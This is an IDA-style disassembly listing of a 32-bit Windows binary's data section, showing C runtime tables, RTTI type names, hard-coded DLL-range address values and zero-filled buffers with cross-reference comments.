dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_443A40 dd 0FFFFFFFFh, 0A80h ; DATA XREF: __filbuf:loc_421CE6�o
; __flsbuf:loc_4221E1�o
off_443A48 dd offset sub_427274 ; DATA XREF: ___libm_error_support+11A�r
; ___libm_error_support+1D5�r ...
dword_443A4C dd 173Fh ; DATA XREF: __floor_default+D�r
off_443A50 dd offset __cfltcvt ; DATA XREF: __cfltcvt_init+5�w
; __output+476�r
off_443A54 dd offset __cropzeros ; DATA XREF: __cfltcvt_init+A�w
; __output+4A2�r
off_443A58 dd offset __fassign ; DATA XREF: __cfltcvt_init+14�w
; __input+5B5�r
off_443A5C dd offset __forcdecpt ; DATA XREF: __cfltcvt_init+1E�w
; __output+491�r
off_443A60 dd offset __positive ; DATA XREF: __cfltcvt_init+28�w
off_443A64 dd offset __cfltcvt ; DATA XREF: __cfltcvt_init+32�w
dd offset ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z ; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)
dd offset sub_4254B5
off_443A70 dd offset sub_4254B5 ; DATA XREF: sub_4254E2+C�r
align 10h
dword_443A80 dd 1B3Fh ; DATA XREF: __floor_default_0+D�r
dword_443A84 dd 1 ; DATA XREF: _tolower+18�r
dword_443A88 dd 2 ; DATA XREF: __NMSG_WRITE:loc_42608F�r
; __NMSG_WRITE+3A�r
off_443A8C dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+D5�r
; __NMSG_WRITE+112�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 43A11Ch, 9, 43A0F0h, 0Ah, 43A058h, 10h, 43A02Ch
dd 11h, 439FFCh, 12h, 439FD8h, 13h, 439FACh, 18h, 439F74h
dd 19h, 439F4Ch, 1Ah, 439F14h, 1Bh, 439EDCh, 1Ch, 439EB4h
dd 1Dh, 439E10h, 78h, 439DFCh, 79h, 439DECh, 7Ah, 439DDCh
dd 0FCh, 434A60h, 0FFh, 439DCCh
dword_443B20 dd 0C0000005h, 0Bh, 0 ; DATA XREF: __XcptFilter+C�o
; _siglookup+6�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_443B98 dd 3 ; DATA XREF: __XcptFilter+84�r
; _raise+C4�r
dword_443B9C dd 7 ; DATA XREF: __XcptFilter+89�r
; _raise+C9�r
dword_443BA0 dd 0Ah ; DATA XREF: __XcptFilter+6�r
; _siglookup�r
dword_443BA4 dd 8Ch ; DATA XREF: __XcptFilter+B2�r
; __XcptFilter+BA�w ...
dword_443BA8 dd 2694h ; DATA XREF: __handle_qnan1+3�r
; __except1+5D�r
align 10h
dword_443BB0 dd 14h ; DATA XREF: __umatherr:loc_42779B�r
off_443BB4 dd offset aExp ; DATA XREF: __umatherr:loc_42780D�r
; "exp"
dd 1Dh, 439CB8h, 1Ah, 42F6A8h, 1Bh, 439CBCh, 1Fh, 43A420h
dd 13h, 43A418h, 21h, 43A410h, 0Eh, 43A408h, 0Dh, 43A400h
dd 0Fh, 439C80h, 10h, 43A3F8h, 5, 43A3F0h, 1Eh, 43A3ECh
dd 12h, 43A3E8h, 20h, 43A3E4h, 0Ch, 439C88h, 0Bh, 439C90h
dd 15h, 43A3DCh, 1Ch, 439C98h, 19h, 43A3D4h, 11h, 43A3CCh
dd 18h, 43A3C4h, 16h, 43A3BCh, 17h, 43A3B4h, 22h, 43A3B0h
dd 23h, 43A3ACh, 24h, 43A3A8h, 25h, 43A3A0h, 26h, 43A394h
dbl_443C98 dq 1.797693134862316e308 ; DATA XREF: __handle_exc+BC�r
; __handle_exc:loc_42760A�r ...
dd 0
dd 0FFF80000h
dbl_443CA8 dq 1.797693134862316e308 ; DATA XREF: __handle_exc+93�r
; __handle_exc:loc_4275E0�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_443CC0 dt 2.3562723457267347066e313 ; DATA XREF: __set_statfp+B�r
; __set_statfp+1E�r
align 4
tbyte_443CCC dt 1.9149954921904370718e-1233 ; DATA XREF: __set_statfp+30�r
align 4
dword_443CD8 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_427E18�o
dword_443CF0 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_427E2E�o
dword_443D08 dd 2 dup(0) ; DATA XREF: ___multtenpow12+C�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_443E68 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: ___multtenpow12+23�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh
off_443FC4 dd offset off_43A508 ; DATA XREF: .rdata:0043A708�o
; .rdata:0043A868�o
dd 0
a_?avexception@ db '.?AVexception@@',0
off_443FDC dd offset off_43A508 ; DATA XREF: .rdata:off_43A5C0�o
; .rdata:0043A600�o ...
dd 0
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_443FFC dd offset off_43A508 ; DATA XREF: .rdata:off_43A608�o
; .rdata:0043A64C�o ...
dd 0
a_?avlength_err db '.?AVlength_error@std@@',0
align 4
off_44401C dd offset off_43A508 ; DATA XREF: .rdata:off_43A654�o
; .rdata:0043A698�o ...
dd 0
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
off_44403C dd offset off_43A508 ; DATA XREF: .rdata:off_43A6A0�o
; .rdata:0043A6DC�o
dd 0
a_?avtype_info@ db '.?AVtype_info@@',0
align 10h
dword_444060 dd 0 ; DATA XREF: sub_40110F+C8�o
dword_444064 dd 71AB5690h ; DATA XREF: sub_4012D6+61D�w
; sub_4012D6+76C�r ...
dword_444068 dd 71AB157Eh ; DATA XREF: sub_4012D6+678�w
; sub_4012D6+7A4�r ...
dword_44406C dd 71C574FAh ; DATA XREF: sub_4012D6+9BE�w
; sub_4012D6+A33�r ...
dword_444070 dd 7620E8C3h ; DATA XREF: sub_4012D6+859�w
; sub_4012D6+8AC�r ...
dword_444074 dd 71AB5A01h ; DATA XREF: sub_4012D6+540�w
; sub_4012D6+6C4�r ...
dword_444078 dd 762211EFh ; DATA XREF: sub_4012D6+7FE�w
; sub_4012D6+86D�r
dword_44407C dd 77E6C0E3h ; DATA XREF: sub_4012D6+8C�w
; sub_4012D6+E2�r ...
dword_444080 dd 77D5E303h ; DATA XREF: sub_4012D6+1A6�w
; sub_4012D6+1E2�r ...
dword_444084 dd 77D45B19h ; DATA XREF: sub_4012D6+172�w
; sub_4012D6+1C2�r ...
dword_444088 dd 71AB1444h ; DATA XREF: sub_4012D6+624�w
; sub_4012D6+774�r ...
dword_44408C dd 77C71BB0h ; DATA XREF: sub_4012D6+48D�w
; sub_4012D6+4DB�r ...
dword_444090 dd 71B28D0Dh ; DATA XREF: sub_4012D6+B50�w
; sub_40C979+A3�r
dword_444094 dd 71AB155Ah ; DATA XREF: sub_4012D6+59B�w
; sub_4012D6+70C�r ...
dword_444098 dd 7620AFB6h ; DATA XREF: sub_4012D6+83F�w
; sub_4012D6+873�r
dword_44409C dd 77D5E310h ; DATA XREF: sub_4012D6+18C�w
; sub_4012D6+1D2�r ...
dword_4440A0 dd 77D4932Ch ; DATA XREF: sub_4012D6+206�w
; sub_4012D6+227�r ...
dword_4440A4 dd 77EBA6E9h ; DATA XREF: sub_4012D6+58�w
; sub_4012D6+CA�r ...
dword_4440A8 dd 71C4A1B4h ; DATA XREF: sub_4012D6+9A4�w
; sub_4012D6+A23�r ...
dword_4440AC dd 71AB3E5Dh ; DATA XREF: sub_4012D6+5A8�w
; sub_4012D6+718�r ...
dword_4440B0 dd 77D5C13Ah ; DATA XREF: sub_4012D6+220�w
; sub_4012D6+23C�r ...
dword_4440B4 dd 1F7BA3A9h ; DATA XREF: sub_4012D6+BF4�w
; sub_4012D6+C2F�r
dword_4440B8 dd 77DD23D7h ; DATA XREF: sub_4012D6+2A5�w
; sub_4012D6+2F0�r ...
dword_4440BC dd 71AB868Dh ; DATA XREF: sub_4012D6+65E�w
; sub_4012D6+794�r ...
dword_4440C0 dd 77D4456Bh ; DATA XREF: sub_4012D6+22D�w
; sub_414BFB+3F�r ...
dword_4440C4 dd 1F7B9D96h ; DATA XREF: sub_4012D6+C28�w
dword_4440C8 dd 71C4502Ch ; DATA XREF: sub_4012D6+9CB�w
; sub_4012D6+A3B�r ...
dword_4440CC dd 71AB1ED3h ; DATA XREF: sub_4012D6+610�w
; sub_4012D6+764�r ...
dword_4440D0 dd 773F97B0h ; DATA XREF: sub_4012D6+BAA�w
dword_4440D4 dd 77E78C17h ; DATA XREF: sub_4012D6+31�w
; sub_4012D6+AD�r ...
dword_4440D8 dd 71B2A381h ; DATA XREF: sub_4012D6+B43�w
; sub_4012D6+B5F�r ...
dword_4440DC dd 71C21CA3h ; DATA XREF: sub_4012D6+A0C�w
; sub_40F87A+8B�r ...
dword_4440E0 dd 71C453F8h ; DATA XREF: sub_4012D6+9E5�w
; sub_4012D6+A4B�r ...
dword_4440E4 dd 77DD59F0h ; DATA XREF: sub_401000+49�r
; sub_4012D6+298�w ...
dword_4440E8 dd 71C2498Bh ; DATA XREF: sub_4012D6+97D�w
; sub_4012D6+A06�r ...
dword_4440EC dd 71C4576Ch ; DATA XREF: sub_4012D6+9F2�w
; sub_4012D6+A53�r ...
dword_4440F0 dd 77EBB1E7h ; DATA XREF: sub_4012D6+3E�w
; sub_4012D6+BA�r ...
dword_4440F4 dd 77E2C1B3h ; DATA XREF: sub_4012D6+399�w
; sub_4012D6+3DF�r ...
dword_4440F8 dd 77D49A11h ; DATA XREF: sub_4012D6+17F�w
; sub_4012D6+1CA�r ...
dword_4440FC dd 77E686CCh ; DATA XREF: sub_4012D6+72�w
; sub_4012D6+D2�r ...
dword_444100 dd 71AB3C22h ; DATA XREF: sub_4012D6+58E�w
; sub_4012D6+700�r ...
dword_444104 dd 71C24870h ; DATA XREF: sub_4012D6+98A�w
; sub_4012D6+A13�r ...
dword_444108 dd 76214750h ; DATA XREF: sub_4012D6+84C�w
; sub_4012D6+8A4�r ...
dword_44410C dd 76D674FAh ; DATA XREF: sub_4012D6+ADF�w
; sub_4012D6+AE6�r ...
dword_444110 dd 71AB41DAh ; DATA XREF: sub_4012D6+533�w
; sub_4012D6+6B3�r ...
dword_444114 dd 71C3516Ah ; DATA XREF: sub_4012D6+9FF�w
; sub_4012D6+A5B�r ...
dword_444118 dd 77EBA994h ; DATA XREF: sub_4012D6+65�w
; sub_41C444+158�r
dword_44411C dd 77E09070h ; DATA XREF: sub_4012D6+2D9�w
; sub_41B065+4F�r
dword_444120 dd 71AB3F8Dh ; DATA XREF: sub_4012D6+66B�w
; sub_4012D6+79C�r ...
dword_444124 dd 77E6CBF9h ; DATA XREF: sub_4012D6+99�w
; sub_4012D6+EA�r ...
dword_444128 dd 1F7CD214h ; DATA XREF: sub_4012D6+C0E�w
; sub_4012D6+C3F�r
dword_44412C dd 76206853h ; DATA XREF: sub_4012D6+818�w
; sub_4012D6+888�r ...
dword_444130 dd 77C72C6Bh ; DATA XREF: sub_4012D6+4A7�w
; sub_4012D6+4EB�r ...
dword_444134 dd 77DDAB2Fh ; DATA XREF: sub_4012D6+3A6�w
; sub_4012D6+3E7�r ...
dword_444138 dd 73B81E3Bh ; DATA XREF: sub_4012D6+C85�w
; sub_4012D6+C8C�r ...
dword_44413C dd 76206B7Fh ; DATA XREF: sub_4012D6+832�w
; sub_4012D6+898�r ...
dword_444140 dd 71C214BAh ; DATA XREF: sub_4012D6+9B1�w
; sub_4012D6+A2B�r ...
dword_444144 dd 77DD5C55h ; DATA XREF: sub_401000+55�r
; sub_4012D6+2B2�w ...
dword_444148 dd 71ABF628h ; DATA XREF: sub_4012D6+6AC�w
; sub_413848+E0�r
dword_44414C dd 77E802FCh ; DATA XREF: sub_4012D6+A6�w
; sub_4012D6+F2�r
dword_444150 dd 77DD590Bh ; DATA XREF: sub_401000+2A�r
; sub_4012D6+28B�w ...
dword_444154 dd 77EBA595h ; DATA XREF: sub_4012D6+4B�w
; sub_4012D6+C2�r ...
dword_444158 dd 76D629BBh ; DATA XREF: sub_4012D6+91A�w
; sub_4012D6+92E�r ...
dword_44415C dd 71AB1B7Bh ; DATA XREF: sub_4012D6+55A�w
; sub_412DD9+112�r ...
dword_444160 dd 77D4BDCAh ; DATA XREF: sub_4012D6+165�w
; sub_4012D6:loc_401490�r ...
dword_444164 dd 76204E4Dh ; DATA XREF: sub_4012D6+879�w
; sub_418F38+4DA�r ...
dword_444168 dd 71AB2BBFh ; DATA XREF: sub_4012D6+692�w
; sub_4012D6+7B4�r ...
dword_44416C dd 76F36EEBh ; DATA XREF: sub_4012D6+AA2�w
dword_444170 dd 77DDA595h ; DATA XREF: sub_4012D6+33A�w
; sub_41C3D9+55�r
dword_444174 dd 76D67A29h ; DATA XREF: sub_4012D6+AEC�w
; sub_4022F5+8E�r
dword_444178 dd 77C7531Dh ; DATA XREF: sub_4012D6+473�w
; sub_4012D6+4CB�r ...
dword_44417C dd 71AB12F8h ; DATA XREF: sub_4012D6+5C2�w
; sub_4012D6+730�r ...
dword_444180 dd 77C7212Fh ; DATA XREF: sub_4012D6+466�w
; sub_4012D6+4C3�r ...
dword_444184 dd 77C72889h ; DATA XREF: sub_4012D6+4B4�w
; sub_417F75+206�r
dword_444188 dd 71AB401Ch ; DATA XREF: sub_4012D6+5B5�w
; sub_4012D6+724�r ...
dword_44418C dd 76D62A37h ; DATA XREF: sub_4012D6+927�w
; sub_4012D6+93B�r ...
dword_444190 dd 77C729E2h ; DATA XREF: sub_4012D6+49A�w
; sub_4012D6+4E3�r ...
dword_444194 dd 71AB60C9h ; DATA XREF: sub_4012D6+54D�w
; sub_4012D6+6D0�r ...
dword_444198 dd 77DDACABh ; DATA XREF: sub_4012D6+40F�w
; sub_41D779+ED�r
dword_44419C dd 73B81B0Fh ; DATA XREF: sub_4012D6+C92�w
; sub_40274D+6FC7�r
dword_4441A0 dd 71AB1AF4h ; DATA XREF: sub_4011F5+3E�r
; sub_40123B+80�r ...
dword_4441A4 dd 77D902E3h ; DATA XREF: sub_4012D6+1B3�w
; sub_41AEBB+15�r
dword_4441A8 dd 77E96645h ; DATA XREF: sub_4012D6+7F�w
; sub_4012D6+DA�r ...
dword_4441AC dd 71B2ACCBh ; DATA XREF: sub_4012D6+B29�w
; sub_4012D6+B4A�r ...
dword_4441B0 dd 71AB1890h ; DATA XREF: sub_4012D6+644�w
; sub_4012D6+784�r ...
dword_4441B4 dd 77E6D75Bh ; DATA XREF: sub_4012D6+B3�w
dword_4441B8 dd 7620BD61h ; DATA XREF: sub_4012D6+866�w
; sub_4012D6+8B4�r ...
dword_4441BC dd 1F7CB8F8h ; DATA XREF: sub_4012D6+C1B�w
; sub_4012D6+C47�r
dword_4441C0 dd 77C75455h ; DATA XREF: sub_4012D6+480�w
; sub_4012D6+4D3�r ...
dword_4441C4 dd 71AB1740h ; DATA XREF: sub_4012D6+574�w
; sub_4012D6+6E8�r ...
dword_4441C8 dd 77DDA20Bh ; DATA XREF: sub_4012D6+365�w
; sub_4012D6+3BA�r ...
dword_4441CC dd 77D4702Fh ; DATA XREF: sub_4012D6+158�w
; sub_4012D6+1AD�r ...
dword_4441D0 dd 77DE8075h ; DATA XREF: sub_4012D6+37F�w
; sub_4012D6+3CF�r ...
dword_4441D4 dd 71C45229h ; DATA XREF: sub_4012D6+9D8�w
; sub_4012D6+A43�r ...
dword_4441D8 dd 77DDA2AFh ; DATA XREF: sub_4012D6+3B3�w
; sub_4012D6+3EF�r ...
dword_4441DC dd 71AB12A7h ; DATA XREF: sub_4012D6+5F6�w
; sub_40BB72+20�r ...
dword_4441E0 dd 71AB14DCh ; DATA XREF: sub_4012D6+567�w
; sub_4012D6+6DC�r ...
dword_4441E4 dd 71AB3ECEh ; DATA XREF: sub_4012D6+637�w
; sub_4012D6+77C�r ...
dword_4441E8 dd 77DD189Ah ; DATA XREF: sub_401000+5E�r
; sub_4012D6+2BF�w ...
dword_4441EC dd 77DE1291h ; DATA XREF: sub_4012D6+38C�w
; sub_4012D6+3D7�r ...
dword_4441F0 dd 76F36EAAh ; DATA XREF: sub_4012D6+A95�w
; sub_4012D6+A9C�r ...
dword_4441F4 dd 76D62A58h ; DATA XREF: sub_4012D6+934�w
; sub_415F82+112�r
dword_4441F8 dd 1F7D886Ah ; DATA XREF: sub_4012D6+BE7�w
; sub_4012D6+C22�r
dword_4441FC dd 71ABD755h ; DATA XREF: sub_4012D6+69F�w
; sub_4012D6+7BC�r ...
dword_444200 dd 71AB1746h ; DATA XREF: sub_4012D6+5E9�w
; sub_4012D6+754�r ...
dword_444204 dd 77DD7496h ; DATA XREF: sub_4012D6+3C0�w
; sub_41C07C+AB�r
dword_444208 dd 0 ; DATA XREF: sub_4012D6+112�w
dword_44420C dd 71C2FA86h ; DATA XREF: sub_4012D6+997�w
; sub_4012D6+A1B�r ...
dword_444210 dd 1F7CD927h ; DATA XREF: sub_4012D6+C01�w
; sub_4012D6+C37�r
dword_444214 dd 77428B97h ; DATA XREF: sub_4012D6+B9D�w
; sub_4012D6+BA4�r ...
dword_444218 dd 71AB1A6Dh ; DATA XREF: sub_40110F+12�r
; sub_4012D6+6B9�w ...
dword_44421C dd 77C76551h ; DATA XREF: sub_4012D6+459�w
; sub_4012D6+4BB�r ...
dword_444220 dd 71AB32CAh ; DATA XREF: sub_4012D6+685�w
; sub_4012D6+7AC�r ...
dword_444224 dd 71AB1836h ; DATA XREF: sub_40110F+1D�r
; sub_40110F+23�r ...
dword_444228 dd 77DF7311h ; DATA XREF: sub_4012D6+32D�w
; sub_4012D6+341�r ...
dword_44422C dd 77D4808Bh ; DATA XREF: sub_4012D6+213�w
; sub_4012D6+234�r ...
dword_444230 dd 71AB5DE2h ; DATA XREF: sub_4012D6+651�w
; sub_4012D6+78C�r ...
dword_444234 dd 71AB12A7h ; DATA XREF: sub_4012D6+5DC�w
; sub_4012D6+748�r ...
dword_444238 dd 77DD22EAh ; DATA XREF: sub_4012D6+27E�w
; sub_4012D6+2D3�r ...
dword_44423C dd 77D5E38Ch ; DATA XREF: sub_4012D6+199�w
; sub_4012D6+1DA�r ...
dword_444240 dd 71B22C25h ; DATA XREF: sub_4012D6+B36�w
; sub_4012D6+B57�r ...
dword_444244 dd 77DD5D20h ; DATA XREF: sub_4012D6+320�w
; sub_4012D6+334�r ...
dword_444248 dd 77E09134h ; DATA XREF: sub_4012D6+2CC�w
; sub_41B065+47�r
dword_44424C dd 77DE801Bh ; DATA XREF: sub_4012D6+372�w
; sub_4012D6+3C7�r ...
dword_444250 dd 77C76B34h ; DATA XREF: sub_4012D6+44C�w
; sub_4012D6+4AE�r ...
dword_444254 dd 0CC0004h ; DATA XREF: sub_4012D6+8DB�w
; sub_4012D6:loc_401BCF�w ...
dword_444258 dd 762059A3h ; DATA XREF: sub_4012D6+825�w
; sub_4012D6+890�r ...
dword_44425C dd 7622A3F4h ; DATA XREF: sub_4012D6+80B�w
; sub_4012D6+880�r ...
dword_444260 dd 71AB1746h ; DATA XREF: sub_4012D6+5CF�w
; sub_4012D6+73C�r ...
dword_444264 dd 0 ; DATA XREF: sub_4012D6:loc_4013D4�w
; sub_4012D6+12B�w ...
dword_444268 dd 0 ; DATA XREF: sub_4012D6+126�w
; sub_401F92+1C�r
dword_44426C dd 0 ; DATA XREF: sub_4012D6:loc_4014C4�w
; sub_4012D6:loc_40152B�w ...
dword_444270 dd 0 ; DATA XREF: sub_4012D6+250�w
; sub_401F92+50�r
dword_444274 dd 0 ; DATA XREF: sub_4012D6:loc_4015DE�w
; sub_4012D6:loc_401623�w ...
dword_444278 dd 0 ; DATA XREF: sub_4012D6+41E�w
; sub_401F92+84�r
dword_44427C dd 0 ; DATA XREF: sub_4012D6:loc_4017DA�w
; sub_401F92:loc_402042�r
dword_444280 dd 0 ; DATA XREF: sub_4012D6+4FF�w
; sub_401F92+B8�r
dword_444284 dd 0 ; DATA XREF: sub_4012D6:loc_401AAB�w
; sub_401F92:loc_402076�r
dword_444288 dd 0 ; DATA XREF: sub_4012D6+7D0�w
; sub_401F92+EC�r
dword_44428C dd 0 ; DATA XREF: sub_4012D6:loc_401B96�w
; sub_4012D6+8EF�w ...
dword_444290 dd 0 ; DATA XREF: sub_4012D6+8EA�w
; sub_401F92+120�r
dword_444294 dd 0 ; DATA XREF: sub_4012D6:loc_401C2A�w
; sub_401F92:loc_4020DE�r ...
dword_444298 dd 0 ; DATA XREF: sub_4012D6+94F�w
; sub_401F92+154�r
dword_44429C dd 0 ; DATA XREF: sub_4012D6:loc_401D46�w
; sub_401F92:loc_402112�r ...
dword_4442A0 dd 0 ; DATA XREF: sub_4012D6+A6B�w
; sub_401F92+188�r
dword_4442A4 dd 0 ; DATA XREF: sub_4012D6:loc_401D90�w
; sub_401F92:loc_402146�r
dword_4442A8 dd 0 ; DATA XREF: sub_4012D6+AB5�w
; sub_401F92+1BC�r
dword_4442AC dd 0 ; DATA XREF: sub_4012D6:loc_401DDA�w
; sub_401F92:loc_40217A�r
dword_4442B0 dd 0 ; DATA XREF: sub_4012D6+AFF�w
; sub_401F92+1F0�r
dword_4442B4 dd 0 ; DATA XREF: sub_4012D6:loc_401E4E�w
; sub_401F92:loc_4021AE�r
dword_4442B8 dd 0 ; DATA XREF: sub_4012D6+B73�w
; sub_401F92+224�r
dword_4442BC dd 0 ; DATA XREF: sub_4012D6:loc_401E98�w
; sub_401F92:loc_4021E2�r
dword_4442C0 dd 0 ; DATA XREF: sub_4012D6+BBD�w
; sub_401F92+258�r
dword_4442C4 dd 0 ; DATA XREF: sub_4012D6:loc_401F36�w
; sub_401F92:loc_402216�r
dword_4442C8 dd 0 ; DATA XREF: sub_4012D6+C5B�w
; sub_401F92+28C�r
dword_4442CC dd 0 ; DATA XREF: sub_4012D6:loc_401F80�w
; sub_401F92:loc_40224A�r
dword_4442D0 dd 0 ; DATA XREF: sub_4012D6+CA5�w
; sub_401F92+2C0�r
; char Dest[]
Dest db 14h dup(0) ; DATA XREF: sub_4023C9+46�o
dword_4442E8 dd 0 ; DATA XREF: sub_40274D+5B75�r
; sub_40274D+5C52�r ...
dd 7Fh dup(0)
dword_4444E8 dd 0 ; DATA XREF: sub_40AE85+45�w
; sub_40AF6E+3E�w ...
dword_4444EC dd 0 ; DATA XREF: sub_40AE85+3E�w
; sub_40AF6E+44�w ...
dword_4444F0 dd 0 ; DATA XREF: sub_40AE85+52�w
; sub_40AF6E+34�r ...
dword_4444F4 dd 0 ; DATA XREF: sub_40110F+C�r
; sub_4025EF+83�w ...
dword_4444F8 dd 0 ; DATA XREF: sub_40AF6E+6F�r
; sub_40B149+2A�w ...
dword_4444FC dd 0 ; DATA XREF: sub_40274D+719�w
; sub_40274D+94F�w ...
byte_444500 db 0 ; DATA XREF: sub_4025EF+5D�o
; sub_40274D+5ABC�r ...
align 4
dd 493h dup(0)
dword_445750 dd 473Ch dup(0) ; DATA XREF: .rdata:off_43426C�o
db 0
byte_457441 db 3 dup(0) ; DATA XREF: .rdata:off_4377C4�o
dd 0E306h dup(0)
dword_49005C dd 947Ah dup(0) ; DATA XREF: .rdata:off_432F8C�o
db 0
byte_4B5245 db 3 dup(0) ; DATA XREF: .rdata:off_437630�o
dd 7028h dup(0)
dword_4D12E8 dd 0 ; DATA XREF: WinMain(x,x,x,x):loc_40A728�o
; sub_40AE85+13�o ...
; char byte_4D12EC[]
byte_4D12EC db 80h dup(0) ; DATA XREF: WinMain(x,x,x,x)+47C�o
; WinMain(x,x,x,x)+509�o ...
; char byte_4D136C[]
byte_4D136C db 40h dup(0) ; DATA XREF: WinMain(x,x,x,x)+497�o
; char byte_4D13AC[]
byte_4D13AC db 90h dup(0) ; DATA XREF: WinMain(x,x,x,x)+4AE�o
dword_4D143C dd 0 ; DATA XREF: WinMain(x,x,x,x)+49D�w
; WinMain(x,x,x,x)+520�w ...
dword_4D1440 dd 0 ; DATA XREF: WinMain(x,x,x,x)+4B9�w
align 10h
; char dword_4D1450[]
dword_4D1450 dd 0 ; DATA XREF: sub_40274D+A17�o
; sub_40274D+A88�r ...
dd 5 dup(0)
dword_4D1468 dd 0 ; DATA XREF: sub_40274D+A78�r
; sub_417C78+63�r
dd 1Fh dup(0)
dword_4D14E8 dd 0 ; DATA XREF: sub_40B075+16�o
; sub_40B094+19�o
dword_4D14EC dd 2B9h dup(0) ; DATA XREF: sub_40B028+3D�o
dword_4D1FD0 dd 1Bh ; DATA XREF: sub_40274D:loc_404F29�r
; WinMain(x,x,x,x)+3D�w ...
dword_4D1FD4 dd 0 ; DATA XREF: WinMain(x,x,x,x)+136�r
byte_4D1FD8 db 0 ; DATA XREF: sub_402472+29�r
; sub_402472+32�o
align 4
dword_4D1FDC dd 0 ; DATA XREF: sub_40274D+7B0B�w
; WinMain(x,x,x,x)+4CA�w ...
dword_4D1FE0 dd 0 ; DATA XREF: sub_40274D+7E5�r
; WinMain(x,x,x,x)+481�w
dword_4D1FE4 dd 0B63Ch ; DATA XREF: sub_40B690+151�r
; sub_40D055+30�r ...
byte_4D1FE8 db 0 ; DATA XREF: sub_40AD00+64�r
; sub_40AD00+92�w
align 10h
dword_4D1FF0 dd 0 ; DATA XREF: sub_40B619+18�r
; sub_40BBBA+92�w ...
dword_4D1FF4 dd 0 ; DATA XREF: sub_40BCF3+1ED�r
; sub_40BEFE+DC�w ...
dd 7FEh dup(0)
dword_4D3FF0 dd 6 dup(0) ; DATA XREF: sub_40BCF3+C2�o
; sub_40BCF3+125�o ...
dword_4D4008 dd 0 ; DATA XREF: sub_40B494+E�r
; sub_40B494+31�r ...
dword_4D400C dd 0 ; DATA XREF: sub_40B494+9�r
; sub_40B494+25�r ...
dword_4D4010 dd 0 ; DATA XREF: sub_40B690+428�w
; sub_40B690+467�o
; char byte_4D4014[]
byte_4D4014 db 13Eh dup(0) ; DATA XREF: sub_40B690+3F6�o
word_4D4152 dw 0 ; DATA XREF: .rdata:off_436FD4�o
dd 52h dup(0)
; char byte_4D429C[]
byte_4D429C db 104h dup(0) ; DATA XREF: sub_40B690+3CB�o
dword_4D43A0 dd 0 ; DATA XREF: sub_40B690+3ED�w
; sub_40B690+415�r
align 8
dword_4D43A8 dd 0 ; DATA XREF: sub_40B690+45D�w
